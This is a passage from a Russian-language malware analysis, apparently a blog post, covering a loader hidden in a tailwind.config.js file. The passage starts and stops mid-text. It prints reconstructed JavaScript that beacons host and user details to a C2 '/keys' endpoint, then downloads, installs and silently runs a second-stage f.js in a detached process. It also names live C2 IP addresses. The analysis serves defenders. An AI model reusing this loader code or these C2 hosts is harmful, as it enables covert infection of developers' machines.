\u0437\u0430\u043f\u0443\u0449\u0435\u043d \u043a\u043e\u0434. * * \u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 `\/keys` \u043c\u043e\u0436\u0435\u0442 \u0432\u0432\u043e\u0434\u0438\u0442\u044c \u0432 \u0437\u0430\u0431\u043b\u0443\u0436\u0434\u0435\u043d\u0438\u0435: \u043f\u043e \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044e \u044d\u0442\u043e \u0431\u043e\u043b\u044c\u0448\u0435 \u043f\u043e\u0445\u043e\u0436\u0435 * \u043d\u0430 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u044e infected host\/beaconing, \u0430 \u043d\u0435 \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u0430 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 * \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043a\u043b\u044e\u0447\u0435\u0439. * * @returns {void} *\/function reportHost() {  let hostId = hostname;  if (platform[0] === 'd') {    hostId = `${hostId}+${userInfo.username}`;  }  let commandContext = '5A1';  try {    commandContext += process.argv[1];  } catch {}  request.post({    url: `${baseUrl}\/keys`,    formData: {      ts: timestamp,      type,      hid: hostId,      ss: 'oqr',      cc: commandContext,    },  });}\/** * \u0421\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 \u0432\u0442\u043e\u0440\u043e\u0439 \u044d\u0442\u0430\u043f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430 \u0438 \u0433\u043e\u0442\u043e\u0432\u0438\u0442 \u0435\u0433\u043e \u043a \u0437\u0430\u043f\u0443\u0441\u043a\u0443. * * \u0424\u0443\u043d\u043a\u0446\u0438\u044f \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e `~\/.vscode`, \u0435\u0441\u043b\u0438 \u0435\u0451 \u0435\u0449\u0451 \u043d\u0435\u0442. * \u0417\u0430\u0442\u0435\u043c \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 JS-payload \u0441 C2 \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u0435\u0433\u043e \u043a\u0430\u043a `f.js`. * * \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 `~\/.vscode` \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u043f\u043e\u043f\u044b\u0442\u043a\u0430 \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u043a\u0438: * \u0442\u0430\u043a\u0430\u044f \u043f\u0430\u043f\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c\u0441\u044f \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0443 \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u043e\u0439 \u0447\u0430\u0441\u0442\u044c\u044e \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f * VS Code\/Cursor. * * \u0415\u0441\u043b\u0438 \u0441\u043e\u0437\u0434\u0430\u0442\u044c `~\/.vscode` \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c, \u043a\u043e\u0434 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0434\u043e\u043c\u0430\u0448\u043d\u044e\u044e \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e * \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043a\u0430\u043a fallback. * * @returns {void} *\/function downloadAndRunPayload() {  let targetDir = path.join(homeDir, '.vscode');  try {    fs.mkdirSync(targetDir, { recursive: true });  } catch {    targetDir = homeDir;  }  const payloadPath = path.join(targetDir, 'f.js');  try {    fs.rmSync(payloadPath);  } catch {}  request.get(`${baseUrl}\/f\/${type}`, (error, response, body) => {    if (error) return;    try {      fs.writeFileSync(payloadPath, body);    } catch {}    downloadPackageJson(targetDir);  });}\/** * \u0421\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 `package.json` \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043e\u043c \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e npm-\u043f\u0440\u043e\u0435\u043a\u0442\u0430. * * \u041f\u043e\u0441\u043b\u0435 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u044f `f.js` \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441 \u0442\u0430\u043a\u0436\u0435 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 `package.json` * \u0441 C2 endpoint `\/p`. * * \u042d\u0442\u043e \u043d\u0443\u0436\u043d\u043e \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0442\u0440\u0435\u0431\u0443\u044e\u0442\u0441\u044f \u0441\u043a\u0430\u0447\u0430\u043d\u043d\u043e\u043c\u0443 payload. * \u0422\u043e \u0435\u0441\u0442\u044c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441 \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0439 npm-\u043f\u0440\u043e\u0435\u043a\u0442 \u0432\u043d\u0443\u0442\u0440\u0438 `~\/.vscode`. * * \u0412 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u043b\u043e\u0433\u0438\u043a\u0435 \u0435\u0441\u0442\u044c \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u0435 \u0440\u0430\u0437\u043c\u0435\u0440\u0430: * \u0435\u0441\u043b\u0438 \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0439 `package.json` \u043c\u0435\u043d\u044c\u0448\u0435 \u043d\u043e\u0432\u043e\u0433\u043e \u0442\u0435\u043b\u0430 \u043e\u0442\u0432\u0435\u0442\u0430, * \u0444\u0430\u0439\u043b \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f. * * @param {string} targetDir * \u0414\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044f, \u043a\u0443\u0434\u0430 \u0440\u0430\u043d\u0435\u0435 \u0431\u044b\u043b \u0441\u043e\u0445\u0440\u0430\u043d\u0451\u043d `f.js`. * \u041e\u0431\u044b\u0447\u043d\u043e \u044d\u0442\u043e `~\/.vscode`. * * @returns {void} *\/function downloadPackageJson(targetDir) {  const packagePath = path.join(targetDir, 'package.json');  let oldSize = 0;  if (fs.existsSync(packagePath)) {    try {      oldSize = fs.statSync(packagePath).size;    } catch {}  }  request.get(`${baseUrl}\/p`, (error, response, body) => {    if (error) return;    try {      if (body.length > oldSize) {        fs.writeFileSync(packagePath, body);      }    } catch {}    installDependencies(targetDir);  });}\/** * \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0443 npm-\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0434\u043b\u044f \u0441\u043a\u0430\u0447\u0430\u043d\u043d\u043e\u0433\u043e payload. * * \u0424\u0443\u043d\u043a\u0446\u0438\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0432\u0438\u0434\u0430: * * `cd \"<targetDir>\" && npm i --silent` * * \u042d\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441 \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 * \u0438\u0437 \u0441\u043a\u0430\u0447\u0430\u043d\u043d\u043e\u0433\u043e `package.json` \u0431\u0435\u0437 \u044f\u0432\u043d\u043e\u0433\u043e \u0432\u044b\u0432\u043e\u0434\u0430 \u0432 \u043a\u043e\u043d\u0441\u043e\u043b\u044c. * * \u0424\u043b\u0430\u0433 `windowsHide: true` \u043d\u0430 Windows \u0441\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043e\u043a\u043d\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430, * \u0447\u0442\u043e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u043e\u043c \u0441\u043a\u0440\u044b\u0442\u043d\u043e\u0433\u043e \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f. * * \u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 `node_modules` * \u0438 \u0437\u0430\u043f\u0443\u0441\u043a payload. * * @param {string} targetDir * \u0414\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e npm-\u043f\u0440\u043e\u0435\u043a\u0442\u0430, \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u043e\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043e\u043c. * * @returns {void} *\/function installDependencies(targetDir) {  child_process.exec(    `cd \"${targetDir}\" && npm i --silent`,    { windowsHide: true },    () => {      ensureNodeModulesAndRun(targetDir);    },  );}\/** * \u041f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 `node_modules` \u0438 \u043f\u0440\u0438 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0443 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0435\u0439. * * \u0415\u0441\u043b\u0438 \u043f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u044b `npm i --silent` \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044f `node_modules` * \u043d\u0435 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c, \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0430\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u0443: * * `npm --prefix \"<targetDir>\" i` * * \u042d\u0442\u043e \u043f\u043e\u0432\u044b\u0448\u0430\u0435\u0442 \u0448\u0430\u043d\u0441 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u0440\u0430\u0437\u043d\u044b\u0445 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f\u0445. * * \u0415\u0441\u043b\u0438 `node_modules` \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0438\u043b\u0438 \u043f\u043e\u0432\u0442\u043e\u0440\u043d\u0430\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0437\u0430\u0432\u0435\u0440\u0448\u0438\u043b\u0430\u0441\u044c, * \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u0442 \u043a \u0437\u0430\u043f\u0443\u0441\u043a\u0443 payload. * * @param {string} targetDir * \u0414\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044f, \u0433\u0434\u0435 \u043b\u0435\u0436\u0430\u0442 `f.js`, `package.json` \u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 `node_modules`. * * @returns {void} *\/function ensureNodeModulesAndRun(targetDir) {  const nodeModules = path.join(targetDir, 'node_modules');  if (!fs.existsSync(nodeModules)) {    child_process.exec(      `npm --prefix \"${targetDir}\" i`,      { windowsHide: true },      () => runPayload(targetDir),    );  } else {    runPayload(targetDir);  }}\/** * \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0441\u043a\u0430\u0447\u0430\u043d\u043d\u044b\u0439 `f.js` \u043a\u0430\u043a \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u0444\u043e\u043d\u043e\u0432\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441. * * \u041f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435 \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u043f\u043e \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430\u043c: * * \u041d\u0430 Windows: * - \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0442\u0435\u043a\u0443\u0449\u0438\u0439 Node.js runtime \u0447\u0435\u0440\u0435\u0437 `process.execPath`; * - \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u043e\u043c \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442\u0441\u044f `f.js`; * - \u0440\u0430\u0431\u043e\u0447\u0430\u044f \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044f \u2014 `targetDir`; * - \u043e\u043a\u043d\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0441\u043a\u0440\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 `windowsHide: true`; * - stdio \u0438\u0433\u043d\u043e\u0440\u0438\u0440\u0443\u0435\u0442\u0441\u044f. * * \u041d\u0430 Linux\/macOS: * - \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f `nohup`; * - \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f detached; * - stdin\/stdout\/stderr \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432 ignore \u0438\u043b\u0438 `\/dev\/null`; * - \u043f\u043e\u0441\u043b\u0435 `unref()` \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u043e\u0442\u0432\u044f\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043e\u0442 \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044f. * * \u0418\u0442\u043e\u0433: payload \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0443 \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f npm\/build-\u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430, * \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u043b `tailwind.config.js`. * * @param {string} targetDir * \u0414\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044f, \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u0443\u0434\u0435\u0442 \u0437\u0430\u043f\u0443\u0449\u0435\u043d `f.js`. * * @returns {void} *\/function runPayload(targetDir) {  if (platform[0] === 'w') {    const child = child_process.spawn(      process.execPath,      ['f.js'],      {        cwd: targetDir,        stdio: 'ignore',        windowsHide: true,      },    );    child.unref();  } else {    const child = child_process.spawn(      'nohup',      [process.execPath, 'f.js'],      {        cwd: targetDir,        detached: true,        stdio: ['ignore', '\/dev\/null', '\/dev\/null'],      },    );    child.unref();  }}<\/code>
<\/a><\/div><\/pre>\n
\u0427\u0442\u043e \u0436\u0435 \u0442\u0443\u0442 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442?<\/h2>\n
\u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430:<\/p>\n
http:\/\/78.142.218.26:1244\/s\/90284f6b7643\/\/ \u0444\u043e\u043b\u043b\u0431\u0435\u043a \u043d\u0430http:\/\/66.235.168.17:1244\/s\/90284f6b7643<\/code>
<\/a><\/div><\/pre>\n
\u041f\u043e\u0441\u043b\u0435 \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043e\u0436\u0438\u0434\u0430\u0435\u0442\u0441\u044f \u0441\u0442\u0440\u043e\u043a\u0430 \u0432\u0438\u0434\u0430:<\/p>\n
<host>,<type><\/code>
<\/a><\/div><\/pre>\n
\u0423\u0441\u043b\u043e\u0432\u043d\u043e<\/p>\n
example.com,abc<\/code>
<\/a><\/div><\/pre>\n
\u0422\u043e\u0433\u0434\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441 \u0441\u0442\u0440\u043e\u0438\u0442:<\/p>\n
http:\/\/example.com:1244<\/code>
<\/a><\/div><\/pre>\n
\u0418 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442<\/p>\n
type = \"abc\"<\/code>
<\/a><\/div><\/pre>\n
\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u0436\u0435\u0440\u0442\u0432\u0435 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0430:<\/p>\n
http:\/\/<host>:1244\/keys<\/code>
<\/a><\/div><\/pre>\n
\u0421 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e \u0442\u0430\u043a\u0438\u043c\u0438 \u0434\u0430\u043d\u043d\u044b\u043c\u0438:<\/p>\n
{  ts: Date.now().toString(),               \/\/ timestamp \u0437\u0430\u043f\u0443\u0441\u043a\u0430  type: typeFromServer,                    \/\/ \u0442\u0438\u043f\/\u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 payload, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u043e\u0442 C2  hid: hostnameOrHostnamePlusUsername,     \/\/ host identifier  ss: 'oqr',                               \/\/ \u043a\u043e\u043d\u0441\u0442\u0430\u043d\u0442\u0430 \"oqr\", \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043c\u0430\u0440\u043a\u0435\u0440 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0438\u043b\u0438 \u0432\u0435\u0440\u0441\u0438\u0438  cc: '5A1' + process.argv[1]              \/\/ \u0441\u0442\u0440\u043e\u043a\u0430 \"5A1\" + \u043f\u0443\u0442\u044c \u043a \u0442\u0435\u043a\u0443\u0449\u0435\u043c\u0443 \u0441\u043a\u0440\u0438\u043f\u0442\u0443\/\u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0443}<\/code>
<\/a><\/div><\/pre>\n
\u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442:<\/p>\n
if (platform[0] === 'd') {  hid = hostname + '+' + username;}<\/code>
<\/a><\/div><\/pre>\n
os.platform()<\/code> \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442:<\/p>\n
win32linuxdarwin<\/code>
<\/a><\/div><\/pre>\n
\u0422\u043e \u0435\u0441\u0442\u044c username \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0438\u043c\u0435\u043d\u043d\u043e \u0434\u043b\u044f macOS (darwin).<\/p>\n
\u0417\u0430\u0442\u0435\u043c \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u043f\u043e\u043f\u044b\u0442\u043a\u0430 \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e:<\/p>\n
~\/.vscode<\/code>
<\/a><\/div><\/pre>\n
\u0410 \u0435\u0441\u043b\u0438 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442\u0441\u044f, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u043e\u0441\u0442\u043e \u0434\u043e\u043c\u0430\u0448\u043d\u044f\u044f \u043f\u0430\u043f\u043a\u0430:<\/p>\n
let targetDir = path.join(os.homedir(), '.vscode');try {  fs.mkdirSync(targetDir, { recursive: true });} catch {  targetDir = os.homedir();}<\/code>
<\/a><\/div><\/pre>\n
\u041f\u043e\u0447\u0435\u043c\u0443 .vscode<\/code>? \u042d\u0442\u043e \u0445\u043e\u0440\u043e\u0448\u0438\u0439 \u0432\u044b\u0431\u043e\u0440 \u0434\u043b\u044f \u0430\u0442\u0430\u043a\u0438. \u0422\u0430\u043a\u0430\u044f \u043f\u0430\u043f\u043a\u0430 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043f\u0440\u0438\u0432\u044b\u0447\u043d\u043e \u0434\u043b\u044f \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u0438 \u043d\u0435 \u0431\u0440\u043e\u0441\u0430\u0435\u0442\u0441\u044f \u0432 \u0433\u043b\u0430\u0437\u0430 \u0440\u044f\u0434\u043e\u043c \u0441 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f\u043c\u0438 VS Code \u0438\u043b\u0438 Cursor.<\/p>\n
\u0417\u0430\u0442\u0435\u043c \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u0435:<\/p>\n
http:\/\/<host>:1244\/f\/<type><\/code>
<\/a><\/div><\/pre>\n
\u0418 payload \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 ~\/.vscode\/f.js<\/code>.<\/p>\n
\u0417\u0430\u0442\u0435\u043c \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 http:\/\/<host>:1244\/p<\/code> \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0438 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0442\u0441\u044f \u0432 ~\/.vscode\/package.json<\/code>.<\/p>\n
\u0414\u0430\u043b\u0435\u0435 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438:<\/p>\n
cd \"~\/.vscode\" && npm i --silentnpm --prefix \"~\/.vscode\" i<\/code>
<\/a><\/div><\/pre>\n
\u042d\u0442\u043e \u0432\u0430\u0436\u043d\u043e: \u043a\u043e\u0434 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u0442 f.js<\/code>, \u0430 \u0435\u0449\u0451 \u0438 \u043f\u043e\u0434\u0433\u043e\u0442\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0439 npm-\u043f\u0440\u043e\u0435\u043a\u0442 \u0432\u043d\u0443\u0442\u0440\u0438 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 \u043f\u0430\u043f\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0422\u043e \u0435\u0441\u0442\u044c \u0441\u043e\u0437\u0434\u0430\u0451\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u044b\u0439 Node.js-\u043f\u0440\u043e\u0435\u043a\u0442 \u0432\u043d\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f. \u0414\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u043f\u043e\u0442\u043e\u043c \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u043f\u0430\u043f\u043a\u0443 \u0441 \u0442\u0435\u0441\u0442\u043e\u0432\u044b\u043c \u0437\u0430\u0434\u0430\u043d\u0438\u0435\u043c, ~\/.vscode\/f.js<\/code> \u0438 ~\/.vscode\/node_modules<\/code> \u043c\u043e\u0433\u0443\u0442 \u043e\u0441\u0442\u0430\u0442\u044c\u0441\u044f \u0432 \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u0439 \u043f\u0430\u043f\u043a\u0435. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043b\u043e\u0433\u0438\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0443\u0436\u0435 \u043d\u0435 \u0432 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u043c \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438, \u0430 \u0432 \u0444\u0430\u0439\u043b\u0435, \u0441\u043a\u0430\u0447\u0430\u043d\u043d\u043e\u043c \u043d\u0430 \u0432\u0442\u043e\u0440\u043e\u043c \u044d\u0442\u0430\u043f\u0435.<\/p>\n
\u0417\u0430\u0442\u0435\u043c payload \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0432 \u0444\u043e\u043d\u0435:<\/p>\n
\/\/ \u043d\u0430 Windowschild_process.spawn(process.execPath, ['f.js'], {  cwd: targetDir,  stdio: 'ignore',  windowsHide: true,});\/\/ \u043d\u0430 Linux\/MacOschild_process.spawn('nohup', [process.execPath, 'f.js'], {  cwd: targetDir,  detached: true,  stdio: ['ignore', '\/dev\/null', '\/dev\/null'],});<\/code>
<\/a><\/div><\/pre>\n
\u0418 \u043f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u043e\u0442\u0432\u044f\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043e\u0442 \u0440\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0436\u0438\u0442\u044c \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e:<\/p>\n
child.unref();<\/code>
<\/a><\/div><\/pre>\n
\u0415\u0441\u0442\u044c \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0438\u043d\u0442\u0435\u0440\u0432\u0430\u043b (10 \u043c\u0438\u043d\u0443\u0442 16 \u0441\u0435\u043a\u0443\u043d\u0434), \u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441 \u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u0441\u043a\u0430\u0447\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435, \u0435\u0441\u043b\u0438 \u0441\u0435\u0440\u0432\u0435\u0440 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d. \u0427\u0435\u0440\u0435\u0437 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0438\u043d\u0442\u0435\u0440\u0432\u0430\u043b \u043e\u0447\u0438\u0449\u0430\u0435\u0442\u0441\u044f.<\/p>\n
\u0427\u0442\u043e \u0436\u0435 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f?<\/h2>\n
